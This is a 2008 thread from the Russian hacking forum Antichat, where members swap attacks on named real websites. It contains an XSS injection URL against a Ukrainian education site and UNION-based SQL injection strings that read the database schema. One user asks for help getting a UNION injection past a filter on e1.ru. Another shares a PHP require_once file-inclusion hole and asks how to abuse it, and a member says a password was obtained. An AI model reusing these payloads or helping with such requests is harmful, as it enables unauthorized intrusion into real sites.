HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2121  
Старый 29.05.2008, 00:24
На100ящий
Познающий
Регистрация: 10.01.2008
Сообщений: 43
С нами: 9650515

Репутация: 5
По умолчанию

Sabe, а ты случайно админку не нашёл???))))
 
Ответить с цитированием

  #2122  
Старый 29.05.2008, 00:29
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

Constantine
обновил пост. пасс получил этим способом)
пс: немножко подкурил..)
На100ящий
это я у тебя спрашиваю..) смысл взлома?)

Последний раз редактировалось sabe; 07.06.2008 в 22:09..
 
Ответить с цитированием

  #2123  
Старый 29.05.2008, 00:30
На100ящий
Познающий
Регистрация: 10.01.2008
Сообщений: 43
С нами: 9650515

Репутация: 5
По умолчанию

Constantine, спс за ссылку....будем знать!!!! всё, надо ложиться спать, а то завтра гос(((
 
Ответить с цитированием

  #2124  
Старый 29.05.2008, 00:32
На100ящий
Познающий
Регистрация: 10.01.2008
Сообщений: 43
С нами: 9650515

Репутация: 5
По умолчанию

Sabe, пока учимся....))))
 
Ответить с цитированием

  #2125  
Старый 29.05.2008, 00:35
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

ну я тоже пока учусь..)

хсс+
Цитата:
http://www.osvita-servis.com.ua/index.php?p=%22%3E%3Cscript%3Ealert(/hacked%20by%20VITAL/)%3C/script%3E

Последний раз редактировалось sabe; 29.05.2008 в 00:54..
 
Ответить с цитированием

  #2126  
Старый 29.05.2008, 00:53
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

/index.php?p=-1+union+select+1,2,unhex(hex(table_name))+from+INF ORMATION_SCHEMA.TABLES/*
или так
__________________
 
Ответить с цитированием

  #2127  
Старый 29.05.2008, 06:35
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
С нами: 10646246

Репутация: 34
По умолчанию

ребята это инфо что то дает мне? есть толк от этой инфо?

Цитата:
http://www.bladeauction.com/

Последний раз редактировалось 1SeTh; 29.05.2008 в 06:38..
 
Ответить с цитированием

  #2128  
Старый 29.05.2008, 06:47
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

забей он просто упал)) как встанет почекаем на скуль..)

http://www.bladeauction.com/index.php
 
Ответить с цитированием

  #2129  
Старый 29.05.2008, 07:58
nightmare007
Новичок
Регистрация: 28.10.2006
Сообщений: 23
С нами: 10281445

Репутация: 1
Question

вот у мя тут созрел пост:

значит рассматривается cms wow-ultimate...

при запросе
Цитата:
http://site/index.php?name=...
если ввести в name каконить брет, типа (ghj) то выдается:

Цитата:
Fatal error: require_once() [function.require]: Failed opening required 'modules/ghj.php' (include_path='.;/usr/local/php5/PEAR') in Z:\home\site\www\templates\wolk\block-center.php on line 6
это говрит о том что при запросе подгружается модуль из папки "modules" ,выполняется подгрузка с помощью функции require_once() которая прописана в файле "Z:\home\site\www\templates\wolk\block-center.php"

block-center.php:
PHP код:
<?php
if (!$menu = &$_GET['page']) 
$menu=$main_page;
print 
"<table align=\"center\" valign=\"top\" cellSpacing=\"0\" cellPadding=\"0\" width=\"100%\" border=\"0\" ><tr>
<td width=\"100%\" valign=\"top\" align=\"center\" >"
;
require_once(
"modules/$menu.php");
print 
"</td></tr></table>";

?>
из кода можно увидеть что модуль вызывается посредствам подстановки переменой "$menu" в функцию
PHP код:
require_once("modules/$menu.php"
терь собсно вапрос:
я читал что с помощью уязвимой функции require_once можно инклюдить php файлы с разными нихарошими кодами... можноли здесь чонить придумать :?
 
Ответить с цитированием

Помогите раскрутить
  #2130  
Старый 29.05.2008, 11:34
z3r0cool
Познающий
Регистрация: 22.04.2008
Сообщений: 32
С нами: 9501269

Репутация: 56
По умолчанию Помогите раскрутить

Всем привет!
Помогите раскрутить:
http://www.e1.ru/wap/tv/index.php?p_id=107/**/AND/**/1=2/**/UNION/**/SELECT/**/1,2,3/*

Похоже что есть apache security_mod, либо что-то самописное, не пропускает "FROM", сломал весь мозг

PS:понадобится wml browser.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...